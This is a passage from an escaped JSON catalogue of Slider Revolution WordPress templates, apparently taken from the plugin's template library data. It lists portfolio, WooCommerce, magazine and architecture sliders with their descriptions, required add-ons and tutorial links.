[Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-great-looking-masonry-portfolio-for-your-home-page\\/\",\"guide_img\":\"tutorial\\/Creative-Portfolio-Website.png\",\"active\":\"1\",\"package_id\":\"58\",\"installed\":false},\"626\":{\"id\":\"671\",\"title\":\"Creative Portfolio Project 7\",\"alias\":\"creative-portfolio-project-7\",\"zip\":\"packs\\/creative-portfolio-project-7.zip\",\"uid\":\"bb1552746859766efbe319d7c0a1978e\",\"img\":\"creative-portfolio-project-7\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/creative-portfolio-website-slider?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=creative-portfolio-website-slider\",\"version\":\"1.0.0\",\"required\":\"6.5.25\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">This one-page portfolio website template was built to impress. Shine a spotlight on all your work with this striking, interactive design and wow prospective clients the second they step foot inside your site.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"slider\",\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-particlewave-addon\\\\\\/revslider-particlewave-addon.php\\\",\\\"name\\\":\\\"Particle Wave AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-07-18 17:24:03\",\"package\":\"Creative Portfolio Website Slider Package\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"How to Create a Great-looking Masonry Portfolio for Your Home Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-great-looking-masonry-portfolio-for-your-home-page\\/\",\"guide_img\":\"tutorial\\/Creative-Portfolio-Website.png\",\"active\":\"1\",\"package_id\":\"58\",\"installed\":false},\"627\":{\"id\":\"672\",\"title\":\"AI Particle Cluster Hero\",\"alias\":\"ai-particle-cluster\",\"zip\":\"ai-particle-cluster.zip\",\"uid\":\"e47971fc290d738faca66e100cc7da74\",\"img\":\"ai-particle-cluster\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/ai-particle-cluster-hero\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=ai-particle-cluster-hero\",\"version\":\"1.0.0\",\"required\":\"6.6.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">If you are looking for a stunning, interactive particles animation for your WordPress website, this Slider Revolution template surely is a unique eye-catcher.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\",\"Special FX\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-thecluster-addon\\\\\\/revslider-thecluster-addon.php\\\",\\\"name\\\":\\\"Slider Revolution The Cluster AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-10-06 12:25:01\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"Make Visitors Want to Stop and Play with Your Particle Animation Hero Image [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/make-visitors-want-to-stop-and-play-with-your-particle-animation-hero-image\\/\",\"guide_img\":\"tutorial\\/ai-particle-cluster.png\",\"active\":\"1\",\"installed\":false},\"628\":{\"id\":\"673\",\"title\":\"Artistic Parallax Slider\",\"alias\":\"artistic-parallax-slider\",\"zip\":\"artistic-parallax-slider.zip\",\"uid\":\"a1488f5f4d3ffd2912f9520bba2a2418\",\"img\":\"artistic-parallax-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/artistic-parallax-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=artistic-parallax-slider\",\"version\":\"1.0.0\",\"required\":\"6.6.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Gorgeous visuals and clear typography, paired with scroll-based slide navigation, make this WordPress parallax slider template a winner for a wide range of use cases.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-10-06 12:29:34\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Surreal Design for Your Hero Image [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-surreal-design-for-your-hero-image\\/\",\"guide_img\":\"tutorial\\/artistic-parallax-slider.png\",\"active\":\"1\",\"installed\":false},\"629\":{\"id\":\"674\",\"title\":\"Magazine Content Slider\",\"alias\":\"magazine-content-slider\",\"zip\":\"magazine-content-slider.zip\",\"uid\":\"6701ec2aab76c253004d6ed5755cf9f6\",\"img\":\"magazine-content-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/magazine-content-slider?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=magazine-content-slider\",\"version\":\"1.0.0\",\"required\":\"6.6.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">This WordPress content slider can display any static content or your WordPress posts. Like any element in this featured slider template, the optional menu can easily be removed if its not needed.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"postbased\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-10-06 12:32:38\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Promote Your Top Content with a Magazine-style Slider [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-promote-your-top-content-with-a-magazine-style-slider\\/\",\"guide_img\":\"tutorial\\/Magazine-Content-Slider.png\",\"active\":\"1\",\"installed\":false},\"630\":{\"id\":\"675\",\"title\":\"Magazine Content Slider Static\",\"alias\":\"magazine-content-slider-static\",\"zip\":\"magazine-content-slider-static.zip\",\"uid\":\"3b1f7d279064fa1fb90bb2000e9ebc7b\",\"img\":\"magazine-content-slider-static\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/magazine-content-slider?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=magazine-content-slider\",\"version\":\"1.0.0\",\"required\":\"6.6.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">This WordPress content slider can display any static content or your WordPress posts. Like any element in this featured slider template, the optional menu can easily be removed if it\'s not needed.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\",\"postbased\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-10-06 12:35:12\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Promote Your Top Content with a Magazine-style Slider [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-promote-your-top-content-with-a-magazine-style-slider\\/\",\"guide_img\":\"tutorial\\/Magazine-Content-Slider.png\",\"active\":\"1\",\"installed\":false},\"631\":{\"id\":\"676\",\"title\":\"Masonry Gallery Carousel\",\"alias\":\"Masonry-Gallery-Carousel\",\"zip\":\"Masonry-Gallery-Carousel.zip\",\"uid\":\"c189884a358e4984c8f300916909f54b\",\"img\":\"Masonry-Gallery-Carousel\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/masonry-gallery-carousel\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=masonry-gallery-carousel\",\"version\":\"1.0.0\",\"required\":\"6.6.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">This masonry gallery template for Slider Revolution has three different masonry layouts, which can be mixed & matched and are easily customized. The headline and description captions make this template very flexible, with many use cases.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"carousel\"],\"plugin_require\":null,\"date\":\"2022-10-06 12:39:35\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Horizontal Masonry Layout for Your Work [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-horizontal-masonry-layout-for-your-work\\/\",\"guide_img\":\"tutorial\\/Masonry-Gallery-Carousel.png\",\"active\":\"1\",\"installed\":false},\"632\":{\"id\":\"677\",\"title\":\"Neon WordPress Slider With Text\",\"alias\":\"neon-wordpress-slider\",\"zip\":\"neon-wordpress-slider.zip\",\"uid\":\"9d620dfc8df1be5b956a70106a4ca5d7\",\"img\":\"neon-wordpress-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/neon-wordpress-slider-with-text\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=neon-wordpress-slider-with-text\",\"version\":\"1.0.0\",\"required\":\"6.6.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">This is not your average WordPress slider with text and image. Stunning, AI generated images paired with crisp & snappy animations make this Slider Revolution template a winner!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\",\"Special FX\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-10-06 12:41:29\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"Break Down Your Process with a Colorful Image Slider [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/break-down-your-process-with-a-colorful-image-slider\\/\",\"guide_img\":\"tutorial\\/neon-wordpress-slider.png\",\"active\":\"1\",\"installed\":false},\"633\":{\"id\":\"678\",\"title\":\"Restaurant One Page Website\",\"alias\":\"Restaurant-One-Page-Website\",\"zip\":\"Restaurant-One-Page-Website.zip\",\"uid\":\"747730efa359467cb5627ae123839090\",\"img\":\"Restaurant-One-Page-Website\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/kostlich-restaurant-one-page-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=kostlich-restaurant-one-page-website\",\"version\":\"1.0.0\",\"required\":\"6.6.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">A restaurant WordPress template can easily be overloaded with features that no one really needs. The K\\u00f6stlich Restaurant One Page Website template for Slider Revolution focuses on the information, a visitor wants to see.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"carousel\"],\"plugin_require\":null,\"date\":\"2022-10-06 12:43:57\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"A Fast and Easy Way to Create a Good Looking One-Page Restaurant Website [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-fast-and-easy-way-to-create-a-good-looking-one-page-restaurant-website\\/\",\"guide_img\":\"tutorial\\/Restaurant-One-Page-Website.png\",\"active\":\"1\",\"installed\":false},\"634\":{\"id\":\"679\",\"title\":\"WooCommerce Slider\",\"alias\":\"woocommerce-slider\",\"zip\":\"woocommerce-slider.zip\",\"uid\":\"5f354f9d17d3b8562e7dfbac0b289ab3\",\"img\":\"woocommerce-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/sneaker-woocommerce-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=sneaker-woocommerce-slider\",\"version\":\"1.0.0\",\"required\":\"6.6.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Sell your products faster with this futuristic looking slider with sleek navigation and clean layout<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\",\"woocommerce\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-10-06 12:47:34\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Beautiful 3D WooCommerce Product Slider [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-beautiful-3d-woocommerce-product-slider\\/\",\"guide_img\":\"tutorial\\/woocommerce-slider-static.png\",\"active\":\"1\",\"installed\":false},\"635\":{\"id\":\"680\",\"title\":\"WooCommerce Slider Static\",\"alias\":\"woocommerce-slider-static\",\"zip\":\"woocommerce-slider-static.zip\",\"uid\":\"66d86a41303223abecec3c4820bcd8f0\",\"img\":\"woocommerce-slider-static\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/sneaker-woocommerce-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=sneaker-woocommerce-slider\",\"version\":\"1.0.0\",\"required\":\"6.6.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Sell your products faster with this futuristic looking slider with sleek navigation and clean layout<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-10-06 12:50:07\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Beautiful 3D WooCommerce Product Slider [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-beautiful-3d-woocommerce-product-slider\\/\",\"guide_img\":\"tutorial\\/woocommerce-slider-static.png\",\"active\":\"1\",\"installed\":false},\"636\":{\"id\":\"681\",\"title\":\"WordPress Post Slider\",\"alias\":\"wordpress-post-slider\",\"zip\":\"wordpress-post-slider.zip\",\"uid\":\"c854a5e0be29cb28893b0bb98d9e6740\",\"img\":\"wordpress-post-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/superhero-wordpress-post-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=superhero-wordpress-post-slider\",\"version\":\"1.0.0\",\"required\":\"6.6.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">This amazing Slider Revolution post slider can display static and dynamic WordPress content. Display your blog posts automatically or add your texts and images manually!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\",\"postbased\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-10-06 12:52:10\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"Make Your Employees Look Like Superheroes with a Comic-inspired Slider [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/make-your-employees-look-like-superheroes-with-a-comic-inspired-slider\\/\",\"guide_img\":\"tutorial\\/WordPress-Post-Slider-Static.png\",\"active\":\"1\",\"installed\":false},\"637\":{\"id\":\"682\",\"title\":\"WordPress Post Slider Static\",\"alias\":\"WordPress-Post-Slider-Static\",\"zip\":\"WordPress-Post-Slider-Static.zip\",\"uid\":\"edbb9e724f7758aff215ab3e743abd9e\",\"img\":\"WordPress-Post-Slider-Static\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/superhero-wordpress-post-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=superhero-wordpress-post-slider\",\"version\":\"1.0.0\",\"required\":\"6.6.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">This amazing Slider Revolution post slider can display static and dynamic WordPress content. Display your blog posts automatically or add your texts and images manually!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-10-06 12:53:43\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"Make Your Employees Look Like Superheroes with a Comic-inspired Slider [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/make-your-employees-look-like-superheroes-with-a-comic-inspired-slider\\/\",\"guide_img\":\"tutorial\\/WordPress-Post-Slider-Static.png\",\"active\":\"1\",\"installed\":false},\"638\":{\"id\":\"683\",\"title\":\"Wordpress Video Slider\",\"alias\":\"wordpress-video-slider\",\"zip\":\"wordpress-video-slider.zip\",\"uid\":\"fd50cf2c76a1fe0bf8bd35e727a00bb7\",\"img\":\"wordpress-video-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/wordpress-video-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-video-slider\",\"version\":\"1.0.0\",\"required\":\"6.6.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">The WordPress Video Slider template for Slider Revolution offers a cinematic video viewing experience. With it is stylish, blurred background videos and a video player modal, this template is a fitting hero module choice for many websites.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-10-06 12:55:51\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create Good Vibes on Your Website with a Background Video Slider [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-good-vibes-on-your-website-with-a-background-video-slider\\/\",\"guide_img\":\"tutorial\\/wordpress-video-slider.png\",\"active\":\"1\",\"installed\":false},\"639\":{\"id\":\"684\",\"title\":\"Architecture Website Template Package\",\"alias\":\"architecture-website-template-package\",\"zip\":\"\",\"uid\":\"architecture-website-template-package\",\"img\":\"packages\\/architecture-website-thumb.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/architecture-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=architecture-website-template\",\"version\":\"1.0.0\",\"required\":\"6.6.0\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">The architecture website template offers a modern, visually appealing one-page layout with flexible customization options. This is not just a real estate website, but can also fit for any other kind of theme!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"slider\",\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"2022-10-06 12:59:17\",\"package\":\"Architecture Website Template Package\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"A Beautiful Way to Showcase Your Best Work for Prospective Clients [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-beautiful-way-to-showcase-your-best-work-for-prospective-clients\\/\",\"guide_img\":\"tutorial\\/Architecture-Website-Template.png\",\"active\":\"1\",\"package_id\":\"59\",\"installed\":false},\"640\":{\"id\":\"685\",\"title\":\"Architecture Menu\",\"alias\":\"architecture-menu\",\"zip\":\"packs\\/architecture-menu.zip\",\"uid\":\"a8c46db54ab5fdbb104aacc0cb26d48a\",\"img\":\"architecture-menu\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/architecture-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=architecture-website-template\",\"version\":\"1.0.0\",\"required\":\"6.6.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">The architecture website template offers a modern, visually appealing one-page layout with flexible customization options. This is not just a real estate website, but can also fit for any other kind of theme!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Revolution Base\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2022-10-06 13:10:25\",\"package\":\"Architecture Website Template Package\",\"package_order\":\"0\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"A Beautiful Way to Showcase Your Best Work for Prospective Clients [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-beautiful-way-to-showcase-your-best-work-for-prospective-clients\\/\",\"guide_img\":\"tutorial\\/Architecture-Website-Template.png\",\"active\":\"1\",\"package_id\":\"59\",\"installed\":false},\"641\":{\"id\":\"686\",\"title\":\"Architecture Header Slider\",\"alias\":\"architecture-header-slider\",\"zip\":\"packs\\/architecture-header-slider.zip\",\"uid\":\"e13d9d910db3371527ceb9f92a27057d\",\"img\":\"architecture-header-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/architecture-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=architecture-website-template\",\"version\":\"1.0.0\",\"required\":\"6.6.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">The architecture website template offers a modern, visually appealing one-page layout with flexible customization options. This is not just a real estate website, but can also fit for any other kind of theme!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2022-10-06 13:12:12\",\"package\":\"Architecture Website Template Package\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"A Beautiful Way to Showcase Your Best Work for Prospective Clients [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-beautiful-way-to-showcase-your-best-work-for-prospective-clients\\/\",\"guide_img\":\"tutorial\\/Architecture-Website-Template.png\",\"active\":\"1\",\"package_id\":\"59\",\"installed\":false},\"642\":{\"id\":\"687\",\"title\":\"Architecture Text Block\",\"alias\":\"architecture-text-block\",\"zip\":\"packs\\/architecture-text-block.zip\",\"uid\":\"c130dd8a5faf7c292c54b99c82226c72\",\"img\":\"architecture-text-block\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/architecture-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=architecture-website-template\",\"version\":\"1.0.0\",\"required\":\"6.6.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">The architecture website template offers a modern, visually appealing one-page layout with flexible customization options. This is not just a real estate website, but can also fit for any other kind of theme!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Slider Package\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":null,\"date\":\"2022-10-06 13:15:46\",\"package\":\"Architecture Website Template Package\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"A Beautiful Way to Showcase Your Best Work for Prospective Clients [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-beautiful-way-to-showcase-your-best-work-for-prospective-clients\\/\",\"guide_img\":\"tutorial\\/Architecture-Website-Template.png\",\"active\":\"1\",\"package_id\":\"59\",\"installed\":false},\"643\":{\"id\":\"688\",\"title\":\"Architecture About\",\"alias\":\"architecture-about\",\"zip\":\"packs\\/architecture-about.zip\",\"uid\":\"5f589ec1e639ed4aa9b44542659cb2e9\",\"img\":\"architecture-about\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/architecture-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=architecture-website-template\",\"version\":\"1.0.0\",\"required\":\"6.6.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">The architecture website template offers a modern, visually appealing one-page layout with flexible customization options. This is not just a real estate website, but can also fit for any other kind of theme!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":null,\"date\":\"2022-10-06 13:17:04\",\"package\":\"Architecture Website Template Package\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"A Beautiful Way to Showcase Your Best Work for Prospective Clients [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-beautiful-way-to-showcase-your-best-work-for-prospective-clients\\/\",\"guide_img\":\"tutorial\\/Architecture-Website-Template.png\",\"active\":\"1\",\"package_id\":\"59\",\"installed\":false},\"644\":{\"id\":\"689\",\"title\":\"Architecture Process Title\",\"alias\":\"architecture-process-title\",\"zip\":\"packs\\/architecture-process-title.zip\",\"uid\":\"6ca17bec2dc410a6c8a80a138c603a3c\",\"img\":\"architecture-process-title\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/architecture-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=architecture-website-template\",\"version\":\"1.0.0\",\"required\":\"6.6.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">The architecture website template offers a modern, visually appealing one-page layout with flexible customization options. This is not just a real estate website, 